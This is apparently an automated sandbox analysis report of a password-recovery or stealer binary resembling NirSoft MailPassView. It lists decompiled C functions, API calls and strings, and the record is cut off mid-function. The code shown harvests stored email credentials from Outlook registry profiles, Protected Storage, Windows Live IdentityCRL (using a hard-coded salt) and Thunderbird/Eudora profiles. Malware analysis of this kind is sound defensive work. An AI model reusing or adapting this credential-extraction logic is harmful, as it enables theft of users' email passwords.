                                                  0x00401f9c
                                                  0x00401f9e
                                                  0x00401f9e
                                                  0x00401f9c
                                                  0x00401fa0
                                                  0x00401fae
                                                  0x00401fb3
                                                  0x00401fb8
                                                  0x004021a9
                                                  0x004021ac
                                                  0x004021b5
                                                  0x004021d5
                                                  0x004021d5
                                                  0x004021d5
                                                  0x004021be
                                                  0x004021c5
                                                  0x004021cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004021cf
                                                  0x00000000
                                                  0x00401fbe
                                                  0x00401fc3
                                                  0x00401fc9
                                                  0x00401fd3
                                                  0x00401fe3
                                                  0x00401fe6
                                                  0x00401feb
                                                  0x00401ff0
                                                  0x004021a0
                                                  0x004021a3
                                                  0x00000000
                                                  0x004021a3
                                                  0x00401ff6
                                                  0x00401ffb
                                                  0x00402002
                                                  0x0040200a
                                                  0x0040200b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040201e
                                                  0x00402025
                                                  0x00402033
                                                  0x0040203a
                                                  0x00402052
                                                  0x0040206e
                                                  0x00402073
                                                  0x0040207d
                                                  0x004020a1
                                                  0x004020a8
                                                  0x004020b6
                                                  0x004020bd
                                                  0x004020c3
                                                  0x004020d6
                                                  0x004020da
                                                  0x004020df
                                                  0x004020f8
                                                  0x004020e1
                                                  0x004020ef
                                                  0x004020f5
                                                  0x00402104
                                                  0x00402117
                                                  0x0040211f
                                                  0x0040213c
                                                  0x00402121
                                                  0x00402133
                                                  0x00402139
                                                  0x00402152
                                                  0x00402165
                                                  0x00000000
                                                  0x00402189
                                                  0x00402199
                                                  0x00000000
                                                  0x0040219f
                                                  0x00402152
                                                  0x00402167
                                                  0x00402167
                                                  0x00402177
                                                  0x0040217c
                                                  0x0040217f
                                                  0x00000000
                                                  0x00402187

                                                  APIs
                                                  • memset.MSVCRT ref: 00401EAD
                                                  • strlen.MSVCRT ref: 00401EC6
                                                  • strlen.MSVCRT ref: 00401ED4
                                                  • strlen.MSVCRT ref: 00401F1A
                                                  • strlen.MSVCRT ref: 00401F28
                                                  • memset.MSVCRT ref: 00401FD3
                                                  • atoi.MSVCRT ref: 00402002
                                                  • memset.MSVCRT ref: 00402025
                                                  • sprintf.MSVCRT ref: 00402052
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • memset.MSVCRT ref: 004020A8
                                                  • memset.MSVCRT ref: 004020BD
                                                  • strlen.MSVCRT ref: 004020C3
                                                  • strlen.MSVCRT ref: 004020D1
                                                  • strlen.MSVCRT ref: 00402104
                                                  • strlen.MSVCRT ref: 00402112
                                                  • memset.MSVCRT ref: 0040203A
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                    • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                  • API String ID: 2492260235-4223776976
                                                  • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                  • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                  • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                  • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4; // executed
				_t49 = E00404837(__ecx); // executed
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}








































                                                  0x0040b9bf
                                                  0x0040b9c4
                                                  0x0040b9cb
                                                  0x0040b9d3
                                                  0x0040b9dc
                                                  0x0040b9e1
                                                  0x0040b9e7
                                                  0x0040b9ef
                                                  0x0040b9f3
                                                  0x0040b9f7
                                                  0x0040b9fb
                                                  0x0040b9ff
                                                  0x0040ba0c
                                                  0x0040ba13
                                                  0x0040ba24
                                                  0x0040ba29
                                                  0x0040ba2b
                                                  0x0040ba41
                                                  0x0040ba52
                                                  0x0040ba57
                                                  0x0040ba59
                                                  0x0040ba7c
                                                  0x0040ba86
                                                  0x0040ba8c
                                                  0x0040ba96
                                                  0x0040bab7
                                                  0x0040babb
                                                  0x0040bb09
                                                  0x0040bb0a
                                                  0x0040bb14
                                                  0x0040bb19
                                                  0x0040bb21
                                                  0x0040bb27
                                                  0x0040bb23
                                                  0x0040bb23
                                                  0x0040bb23
                                                  0x0040bb30
                                                  0x0040bb3d
                                                  0x0040bb51
                                                  0x0040bb5c
                                                  0x0040bb6f
                                                  0x0040bb71
                                                  0x0040bb73
                                                  0x0040bbe3
                                                  0x0040bbe3
                                                  0x00000000
                                                  0x0040bb75
                                                  0x0040bb7b
                                                  0x0040bb8e
                                                  0x0040bb94
                                                  0x0040bb96
                                                  0x00000000
                                                  0x00000000
                                                  0x0040bb98
                                                  0x0040bb9d
                                                  0x0040bb9f
                                                  0x0040bbad
                                                  0x0040bbb9
                                                  0x0040bbbb
                                                  0x0040bbbd
                                                  0x0040bbc4
                                                  0x0040bbcf
                                                  0x0040bbcf
                                                  0x00000000
                                                  0x0040bbbd
                                                  0x0040bba7
                                                  0x0040bba9
                                                  0x0040bbab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040bbd5
                                                  0x0040bbdd
                                                  0x0040bbdf
                                                  0x0040bbdf
                                                  0x00000000
                                                  0x0040bb7b
                                                  0x0040bb73
                                                  0x0040bac1
                                                  0x0040bac6
                                                  0x0040bac8
                                                  0x0040bb07
                                                  0x0040bb07
                                                  0x00000000
                                                  0x0040bb07
                                                  0x0040baca
                                                  0x0040bad1
                                                  0x0040bad9
                                                  0x0040bade
                                                  0x0040bae7
                                                  0x0040baf4
                                                  0x0040bafa
                                                  0x0040bafa
                                                  0x00000000
                                                  0x0040bae7
                                                  0x0040baa5
                                                  0x00000000
                                                  0x0040baa5
                                                  0x0040ba65
                                                  0x00000000
                                                  0x0040ba2d
                                                  0x0040ba2d
                                                  0x0040ba37
                                                  0x0040bbe9
                                                  0x0040bbe9
                                                  0x0040bbf0
                                                  0x0040bbf8
                                                  0x0040bbfd
                                                  0x0040bc05
                                                  0x0040bc0e
                                                  0x0040bc14
                                                  0x0040bc14
                                                  0x0040bc1b
                                                  0x0040bc1f
                                                  0x0040bc27
                                                  0x0040bc30
                                                  0x0040bc39
                                                  0x0040bc3e
                                                  0x0040bc3e
                                                  0x00000000
                                                  0x0040bc3e
                                                  0x0040b9cd
                                                  0x0040b9cd
                                                  0x0040bc40
                                                  0x0040bc46
                                                  0x0040bc46

                                                  APIs
                                                    • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                    • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                    • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                    • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                  • DeleteObject.GDI32(?), ref: 0040BC0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                  • API String ID: 745651260-414181363
                                                  • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                  • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                  • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                  • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 65%
                                                  			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}





















                                                  0x00403c3d
                                                  0x00403c3d
                                                  0x00403c40
                                                  0x00403c44
                                                  0x00403c46
                                                  0x00403c4c
                                                  0x00403c52
                                                  0x00403c5c
                                                  0x00403c66
                                                  0x00403c69
                                                  0x00403c9b
                                                  0x00403c9d
                                                  0x00403c6b
                                                  0x00403c71
                                                  0x00403c79
                                                  0x00403c7b
                                                  0x00403c7e
                                                  0x00403c83
                                                  0x00000000
                                                  0x00403c85
                                                  0x00403c88
                                                  0x00403c8c
                                                  0x00403c8e
                                                  0x00403c90
                                                  0x00000000
                                                  0x00403c92
                                                  0x00403c92
                                                  0x00403c92
                                                  0x00403c90
                                                  0x00403c83
                                                  0x00403ca8
                                                  0x00403cb2
                                                  0x00403cbc
                                                  0x00403cc6
                                                  0x00403cd0
                                                  0x00403cdb
                                                  0x00403cdc
                                                  0x00403ce8
                                                  0x00403cf4
                                                  0x00403d07
                                                  0x00403d0f
                                                  0x00403d11
                                                  0x00403d19
                                                  0x00403d19
                                                  0x00403d2c
                                                  0x00403d34
                                                  0x00403d36
                                                  0x00403d3e
                                                  0x00403d3e
                                                  0x00403d44
                                                  0x00403d49
                                                  0x00403d53
                                                  0x00403d5f
                                                  0x00403d60
                                                  0x00403d69
                                                  0x00403d62
                                                  0x00403d62
                                                  0x00403d62
                                                  0x00403d6e
                                                  0x00403d73
                                                  0x00403d7b
                                                  0x00403d7d
                                                  0x00403d8a
                                                  0x00403d7f
                                                  0x00403d83
                                                  0x00403d83
                                                  0x00403d9f
                                                  0x00403da9
                                                  0x00403db1
                                                  0x00403db3
                                                  0x00403dc0
                                                  0x00403db5
                                                  0x00403db9
                                                  0x00403db9
                                                  0x00403dc9
                                                  0x00403dd4
                                                  0x00403de0
                                                  0x00403dec
                                                  0x00403df2
                                                  0x00403df8
                                                  0x00403dfe
                                                  0x00403e04
                                                  0x00403e09
                                                  0x00403e0f
                                                  0x00403e12
                                                  0x00403e1d
                                                  0x00403e27
                                                  0x00403e27
                                                  0x00403e2c
                                                  0x00403e32
                                                  0x00403e35
                                                  0x00403e45
                                                  0x00403e55
                                                  0x00403e5f
                                                  0x00403e5f
                                                  0x00403e6a
                                                  0x00403e6b
                                                  0x00403e71
                                                  0x00403e7d
                                                  0x00403e86

                                                  APIs
                                                    • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                  • strcpy.MSVCRT(?,?), ref: 00403E45
                                                  Strings
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                  • PStoreCreateInstance, xrefs: 00403C6B
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                  • pstorec.dll, xrefs: 00403C57
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProcstrcpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                  • API String ID: 2884822230-961845771
                                                  • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                  • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                  • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                  • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                  0x0040da04
                                                  0x0040da2a
                                                  0x0040da2e
                                                  0x0040db30
                                                  0x0040db36
                                                  0x0040db36
                                                  0x0040da44
                                                  0x0040da48
                                                  0x0040db26
                                                  0x0040db2a
                                                  0x00000000
                                                  0x0040db2a
                                                  0x0040da67
                                                  0x0040da6f
                                                  0x0040da75
                                                  0x0040da77
                                                  0x0040da80
                                                  0x0040da8c
                                                  0x0040da96
                                                  0x0040daa0
                                                  0x0040daa4
                                                  0x0040dab4
                                                  0x0040dabb
                                                  0x0040dabf
                                                  0x0040daca
                                                  0x0040dad4
                                                  0x0040dadd
                                                  0x0040daf2
                                                  0x0040db0d
                                                  0x0040db0d
                                                  0x0040db16
                                                  0x0040db16
                                                  0x0040daca
                                                  0x0040da8c
                                                  0x0040db20
                                                  0x00000000

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • memcpy.MSVCRT ref: 0040DADD
                                                  • memcpy.MSVCRT ref: 0040DAF2
                                                    • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                    • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                    • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                    • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                  • API String ID: 2768085393-1693574875
                                                  • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                  • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                  • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                  • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
